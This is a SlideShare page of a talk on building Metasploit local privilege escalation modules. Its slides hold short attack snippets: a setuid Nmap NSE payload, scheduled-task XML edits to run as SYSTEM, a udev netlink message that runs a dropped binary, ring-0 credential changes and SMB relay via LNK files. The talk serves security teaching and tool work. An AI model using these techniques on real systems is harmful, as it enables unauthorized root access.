SlideShare a Scribd company logo

Privilege Escalation with Metasploit

Download as PPTX, PDF
egypt
egypt

This document summarizes techniques for privilege escalation using the Metasploit framework. It begins by explaining why Metasploit is useful and why privilege escalation is important for gaining more access and control. It then provides examples of how to write Metasploit modules for local privilege escalation exploits, including generating payloads, including the necessary Metasploit mixins, and interacting with sessions post-exploitation. Specific local privilege escalation techniques demonstrated include exploiting vulnerable setuid binaries like Nmap, modifying Windows scheduled tasks, and relaying Windows authentication. The document concludes by discussing future work to improve Metasploit module development.

Technology
1 of 64
PRIVILEGE ESCALATION WITH THE METASPLOIT FRAMEWORK For when you absolutely, positively, have to have root (and don't mind the occasional kernel panic).
egypt
WHY METASPLOIT?
LARGE OPEN SOURCE COMMUNITY
> C
WHY PRIVILEGE ESCALATION?
HIGH IS BETTER THAN LOW Persistence • Backdoor login facilities, add users Stealth • Modify logs to conceal presence • More options for hiding files/processes Various nefarious activity • Inject into other users' processes • Capture packets
CONTRIVED EXAMPLE int main(int argc, char* argv[]){ setuid(0); setgid(0); execv("/bin/sh",argv); return 0; }
MSF::EXPLOIT::LOCAL • Inherit from Exploit – Provides payloads and handlers • Include Exploit mixins – Most useful right now is Exploit::EXE • Include Post mixins – Provides session interaction – Write files, manipulate registry, etc
CONTRIVED EXPLOIT (1/2) include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File ... 'Platform' => 'linux', 'Arch' => ARCH_X86, ...
CONTRIVED EXPLOIT (2/2) def exploit elf = generate_payload_exe write_file("./foo", elf) cmd_exec("chmod +x ./foo") cmd_exec("/tmp/sh –c ./foo &") end
REAL-WORLD* EXAMPLE -- NMAP • Nmap is a security tool • It needs root for some things • Sometimes admins chmod +s it for convenience * This is not a default configuration and the Nmap man page tells you it's stupid
NMAP SCRIPTING ENGINE • Scan stuff with LUA • Very powerful • Fast and easy to write (compared to C++ for hacking on Nmap itself)
NSE-FLAVORED LUA • Has a specific structure • API expects you to have an action function and several fields – Complains if they aren't there
SETUID NMAP EXPLOIT def exploit cmd = payload.encoded write_file("./f.nse", %Q^os.execute("#{cmd}")^ ) ... cmd_exec( "nmap -p1 ::1 --script ./f.nse" ) end
DEMO: MULTI/LOCAL/SETUID_NMAP "Nmap should never be installed with special privileges (e.g. suid root) for security reasons."
MS10_092_SCHELEVATOR • Stuxnet 0day • Schtasks stores tasks as XML files – Readable/Writable by user that created task • Uses CRC32 to verify integrity
CREATE A TASK… cmdline = "schtasks.exe /create /tn #{taskname} /tr "#{cmd}" /sc monthly /f" ...
MODIFY IT TO RUN AS SYSTEM… content.gsub!( 'LeastPrivilege', 'HighestAvailable' ) content.gsub!( /<UserId>.*</UserId>/, '<UserId>S-1-5-18</UserId>' )
FIND A CRC COLLISION
> C
< C Except when…
COMPILING/ASSEMBLING WITH METASM • Can compile C for x86/x86_64 • Assemble x86, x64, mips, arm, ppc and more • Executables or shared objects
COMPILED C DEV PROCESS* • Develop on a system with headers • "Factorize" structs, #defines, etc – There are gotchas with this • Builds dynamic executables [*] Subject to change without notice
LINUX/LOCAL/UDEV_NETLINK • UDEV gets events from the kernel • On multicast netlink sockets – Which can only be sent by root • Doesn't mind getting unicast – Which can be sent by unpriv users
95-UDEV-LATE.RULES ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"
THE EXPLOIT remove@/d SUBSYSTEM=block DEVPATH=/dev/foo TIMEOUT=10 REMOVE_CMD=/tmp/evil
cparser.parse(main, "main.c") c=cpu.new_ccompiler(cparser,sc) sc.parse(c.compile) sc.assemble elf = sc.encode_string write_file("/tmp/evil", elf) cmd_exec("chmod +x /tmp/evil") cmd_exec("/tmp/evil &")
LINUX/LOCAL/SOCK_SENDPAGE • NULL dereference in proto_ops • Linux allows userspace to mmap(NULL, …) • shellcode at NULL + bug == ring0 code exec
RING 0 SHELLCODE <2.6.29 • Find task struct – 4k or 8k stacks? • Change uid/gid to 0 • Change CAPS bits to all 1s
RING 0 SHELLCODE >= 2.6.29 • Find prepare_kernel_cred function • Find commit_creds function • Call them
DEMO: LINUX/LOCAL/SOCK_SENDPAGE AKA Wunderbar Emporium
LEFTOVER JUNK FROM DEFCON
SMB RELAY Victim Attacker Target Victim begins NTLM authentication against the attacker
SMB RELAY Victim Attacker Target Attacker begins NTLM auth against Target
SMB RELAY Victim Attacker Target Target replies with 8-byte challenge
SMB RELAY Victim Attacker Target Attacker sends Target's challenge to Victim
SMB RELAY Victim Attacker Target Victim calculates challenge response and replies with final authentication packet
SMB RELAY Victim Attacker Target Attacker logs into Target with Victim's credentials
SMB RELAY • Well-known attack • Some mitigations break it, but largely still useful and will be for a long time
Drop LNK file (post/windows/escalate/droplnk) Setup a relay (exploit/windows/smb/smb_relay) Wait for an Admin to open that directory File Server Compromised Attacker Target Create LNK file Victim SMB RELAY + LNK FILE
AUTOMATIC DOMAIN AUTH • Windows stores creds in memory and does NTLM auth using your current token • When you do something in the GUI that requires auth, it happens transparently using those creds • If your user has Local Admin on another box, you can create/start services (usually)
SC_HANDLE WINAPI OpenSCManager( __in_opt LPCTSTR lpMachineName, __in_opt LPCTSTR lpDatabaseName, __in DWORD dwDesiredAccess );
SC_HANDLE WINAPI CreateService( __in SC_HANDLE hSCManager, __in LPCTSTR lpServiceName, __in_opt LPCTSTR lpDisplayName, __in DWORD dwDesiredAccess, __in DWORD dwServiceType, __in DWORD dwStartType, __in DWORD dwErrorControl, __in_opt LPCTSTR lpBinaryPathName, __in_opt LPCTSTR lpLoadOrderGroup, __out_opt LPDWORD lpdwTagId, __in_opt LPCTSTR lpDependencies, __in_opt LPCTSTR lpServiceStartName, __in_opt LPCTSTR lpPassword );
DEMO: OWNING DC USING DA TOKEN Yay automatic authentication
FUTURE WORK 1. Compile to shellcode 2. Upload in memory 3. Fork (prevents parent session crash) 4. Child jumps to shellcode 5. Do the root dance
FUTURE WORK • Port all the stuff in post/*/escalate/ to Exploit::Local • Pull more code up into mixins
CONCLUSIONS • Shells are awesome • Root shells are better • Metasploit is awesomesauce • If it doesn't already do what you need, it's easy to add new modules
• Twitter: @egyp7 • IRC: #metasploit on FreeNode QUESTIONS?
Privilege Escalation with Metasploit

Recommended

Post Metasploitation
Post MetasploitationPost Metasploitation
Post Metasploitation
egypt
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
Matthew Johnson
 
Kafka zero to hero
Kafka zero to heroKafka zero to hero
Kafka zero to hero
Avi Levi
 
Apache Kafka - From zero to hero
Apache Kafka - From zero to heroApache Kafka - From zero to hero
Apache Kafka - From zero to hero
Apache Kafka TLV
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
Phil Estes
 
Dockers zero to hero
Dockers zero to heroDockers zero to hero
Dockers zero to hero
Nicolas De Loof
 
Developing Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache KafkaDeveloping Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache Kafka
Joe Stein
 
Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest
Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest
Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest
Lenz Grimmer
 

Recommended

Post Metasploitation
Post MetasploitationPost Metasploitation
Post Metasploitation
egypt
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
Matthew Johnson
 
Kafka zero to hero
Kafka zero to heroKafka zero to hero
Kafka zero to hero
Avi Levi
 
Apache Kafka - From zero to hero
Apache Kafka - From zero to heroApache Kafka - From zero to hero
Apache Kafka - From zero to hero
Apache Kafka TLV
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
Phil Estes
 
Dockers zero to hero
Dockers zero to heroDockers zero to hero
Dockers zero to hero
Nicolas De Loof
 
Developing Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache KafkaDeveloping Realtime Data Pipelines With Apache Kafka
Developing Realtime Data Pipelines With Apache Kafka
Joe Stein
 
Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest
Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest
Making MySQL Administration a Breeze - A look into a MySQL DBA's toolchest
Lenz Grimmer
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
Yossi Sassi
 
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Codemotion
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
Gianluca Varisco
 
Containerization is more than the new Virtualization: enabling separation of ...
Containerization is more than the new Virtualization: enabling separation of ...Containerization is more than the new Virtualization: enabling separation of ...
Containerization is more than the new Virtualization: enabling separation of ...
Jérôme Petazzoni
 
LXC NSAttach
LXC NSAttachLXC NSAttach
LXC NSAttach
Darshan Parmar
 
Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012
Joe Arnold
 
How Secure Is Your Container? ContainerCon Berlin 2016
How Secure Is Your Container? ContainerCon Berlin 2016How Secure Is Your Container? ContainerCon Berlin 2016
How Secure Is Your Container? ContainerCon Berlin 2016
Phil Estes
 
Cli jbug
Cli jbugCli jbug
Cli jbug
maeste
 
AS7 and CLI
AS7 and CLIAS7 and CLI
AS7 and CLI
JBug Italy
 
AWS Lambda
AWS LambdaAWS Lambda
AWS Lambda
Alexander Savchuk
 
Container Performance Analysis
Container Performance AnalysisContainer Performance Analysis
Container Performance Analysis
Brendan Gregg
 
Container Performance Analysis Brendan Gregg, Netflix
Container Performance Analysis Brendan Gregg, NetflixContainer Performance Analysis Brendan Gregg, Netflix
Container Performance Analysis Brendan Gregg, Netflix
Docker, Inc.
 
Server(less) Swift at SwiftCloudWorkshop 3
Server(less) Swift at SwiftCloudWorkshop 3Server(less) Swift at SwiftCloudWorkshop 3
Server(less) Swift at SwiftCloudWorkshop 3
kognate
 
Linux container, namespaces & CGroup.
Linux container, namespaces & CGroup. Linux container, namespaces & CGroup.
Linux container, namespaces & CGroup.
Neeraj Shrimali
 
linux installation.pdf
linux installation.pdflinux installation.pdf
linux installation.pdf
MuhammadShoaibHussai2
 
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
tdc-globalcode
 
Container & kubernetes
Container & kubernetesContainer & kubernetes
Container & kubernetes
Ted Jung
 
Automated Application Management with SaltStack
Automated Application Management with SaltStackAutomated Application Management with SaltStack
Automated Application Management with SaltStack
inovex GmbH
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production Cloud
Salman Baset
 
The State of the Metasploit Framework.pdf
The State of the Metasploit Framework.pdfThe State of the Metasploit Framework.pdf
The State of the Metasploit Framework.pdf
egypt
 
New Shiny in the Metasploit Framework
New Shiny in the Metasploit FrameworkNew Shiny in the Metasploit Framework
New Shiny in the Metasploit Framework
egypt
 

More Related Content

Similar to Privilege Escalation with Metasploit

Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
Yossi Sassi
 
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Codemotion
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
Gianluca Varisco
 
Containerization is more than the new Virtualization: enabling separation of ...
Containerization is more than the new Virtualization: enabling separation of ...Containerization is more than the new Virtualization: enabling separation of ...
Containerization is more than the new Virtualization: enabling separation of ...
Jérôme Petazzoni
 
LXC NSAttach
LXC NSAttachLXC NSAttach
LXC NSAttach
Darshan Parmar
 
Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012
Joe Arnold
 
How Secure Is Your Container? ContainerCon Berlin 2016
How Secure Is Your Container? ContainerCon Berlin 2016How Secure Is Your Container? ContainerCon Berlin 2016
How Secure Is Your Container? ContainerCon Berlin 2016
Phil Estes
 
Cli jbug
Cli jbugCli jbug
Cli jbug
maeste
 
AS7 and CLI
AS7 and CLIAS7 and CLI
AS7 and CLI
JBug Italy
 
AWS Lambda
AWS LambdaAWS Lambda
AWS Lambda
Alexander Savchuk
 
Container Performance Analysis
Container Performance AnalysisContainer Performance Analysis
Container Performance Analysis
Brendan Gregg
 
Container Performance Analysis Brendan Gregg, Netflix
Container Performance Analysis Brendan Gregg, NetflixContainer Performance Analysis Brendan Gregg, Netflix
Container Performance Analysis Brendan Gregg, Netflix
Docker, Inc.
 
Server(less) Swift at SwiftCloudWorkshop 3
Server(less) Swift at SwiftCloudWorkshop 3Server(less) Swift at SwiftCloudWorkshop 3
Server(less) Swift at SwiftCloudWorkshop 3
kognate
 
Linux container, namespaces & CGroup.
Linux container, namespaces & CGroup. Linux container, namespaces & CGroup.
Linux container, namespaces & CGroup.
Neeraj Shrimali
 
linux installation.pdf
linux installation.pdflinux installation.pdf
linux installation.pdf
MuhammadShoaibHussai2
 
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
tdc-globalcode
 
Container & kubernetes
Container & kubernetesContainer & kubernetes
Container & kubernetes
Ted Jung
 
Automated Application Management with SaltStack
Automated Application Management with SaltStackAutomated Application Management with SaltStack
Automated Application Management with SaltStack
inovex GmbH
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production Cloud
Salman Baset
 

Similar to Privilege Escalation with Metasploit (20)

Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
 
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
 
Containerization is more than the new Virtualization: enabling separation of ...
Containerization is more than the new Virtualization: enabling separation of ...Containerization is more than the new Virtualization: enabling separation of ...
Containerization is more than the new Virtualization: enabling separation of ...
 
LXC NSAttach
LXC NSAttachLXC NSAttach
LXC NSAttach
 
Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012
 
How Secure Is Your Container? ContainerCon Berlin 2016
How Secure Is Your Container? ContainerCon Berlin 2016How Secure Is Your Container? ContainerCon Berlin 2016
How Secure Is Your Container? ContainerCon Berlin 2016
 
Cli jbug
Cli jbugCli jbug
Cli jbug
 
AS7 and CLI
AS7 and CLIAS7 and CLI
AS7 and CLI
 
AWS Lambda
AWS LambdaAWS Lambda
AWS Lambda
 
Container Performance Analysis
Container Performance AnalysisContainer Performance Analysis
Container Performance Analysis
 
Container Performance Analysis Brendan Gregg, Netflix
Container Performance Analysis Brendan Gregg, NetflixContainer Performance Analysis Brendan Gregg, Netflix
Container Performance Analysis Brendan Gregg, Netflix
 
Server(less) Swift at SwiftCloudWorkshop 3
Server(less) Swift at SwiftCloudWorkshop 3Server(less) Swift at SwiftCloudWorkshop 3
Server(less) Swift at SwiftCloudWorkshop 3
 
Linux container, namespaces & CGroup.
Linux container, namespaces & CGroup. Linux container, namespaces & CGroup.
Linux container, namespaces & CGroup.
 
linux installation.pdf
linux installation.pdflinux installation.pdf
linux installation.pdf
 
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
TDC2016POA | Trilha Arquitetura - Apache Kafka: uma introdução a logs distrib...
 
Container & kubernetes
Container & kubernetesContainer & kubernetes
Container & kubernetes
 
Automated Application Management with SaltStack
Automated Application Management with SaltStackAutomated Application Management with SaltStack
Automated Application Management with SaltStack
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production Cloud
 

More from egypt

The State of the Metasploit Framework.pdf
The State of the Metasploit Framework.pdfThe State of the Metasploit Framework.pdf
The State of the Metasploit Framework.pdf
egypt
 
New Shiny in the Metasploit Framework
New Shiny in the Metasploit FrameworkNew Shiny in the Metasploit Framework
New Shiny in the Metasploit Framework
egypt
 
Open Source, Security, and Open Source Security.pdf
Open Source, Security, and Open Source Security.pdfOpen Source, Security, and Open Source Security.pdf
Open Source, Security, and Open Source Security.pdf
egypt
 
Authenticated Code Execution by Design.pptx
Authenticated Code Execution by Design.pptxAuthenticated Code Execution by Design.pptx
Authenticated Code Execution by Design.pptx
egypt
 
One-Liners to Rule Them All
One-Liners to Rule Them AllOne-Liners to Rule Them All
One-Liners to Rule Them All
egypt
 
Offensive Security with Metasploit
Offensive Security with MetasploitOffensive Security with Metasploit
Offensive Security with Metasploit
egypt
 
Shiny
ShinyShiny
Shiny
egypt
 
already-0wned
already-0wnedalready-0wned
already-0wned
egypt
 
State of the Framework Address: Recent Developments in the Metasploit Framework
State of the Framework Address: Recent Developments in the Metasploit FrameworkState of the Framework Address: Recent Developments in the Metasploit Framework
State of the Framework Address: Recent Developments in the Metasploit Framework
egypt
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
egypt
 
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
egypt
 

More from egypt (11)

The State of the Metasploit Framework.pdf
The State of the Metasploit Framework.pdfThe State of the Metasploit Framework.pdf
The State of the Metasploit Framework.pdf
 
New Shiny in the Metasploit Framework
New Shiny in the Metasploit FrameworkNew Shiny in the Metasploit Framework
New Shiny in the Metasploit Framework
 
Open Source, Security, and Open Source Security.pdf
Open Source, Security, and Open Source Security.pdfOpen Source, Security, and Open Source Security.pdf
Open Source, Security, and Open Source Security.pdf
 
Authenticated Code Execution by Design.pptx
Authenticated Code Execution by Design.pptxAuthenticated Code Execution by Design.pptx
Authenticated Code Execution by Design.pptx
 
One-Liners to Rule Them All
One-Liners to Rule Them AllOne-Liners to Rule Them All
One-Liners to Rule Them All
 
Offensive Security with Metasploit
Offensive Security with MetasploitOffensive Security with Metasploit
Offensive Security with Metasploit
 
Shiny
ShinyShiny
Shiny
 
already-0wned
already-0wnedalready-0wned
already-0wned
 
State of the Framework Address: Recent Developments in the Metasploit Framework
State of the Framework Address: Recent Developments in the Metasploit FrameworkState of the Framework Address: Recent Developments in the Metasploit Framework
State of the Framework Address: Recent Developments in the Metasploit Framework
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
 

Recently uploaded

Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
Rohit Gautam
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
Pixlogix Infotech
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...
Zilliz
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 

Recently uploaded (20)

Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...Building RAG with self-deployed Milvus vector database and Snowpark Container...
Building RAG with self-deployed Milvus vector database and Snowpark Container...
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Artificial Intelligence for XMLDevelopment
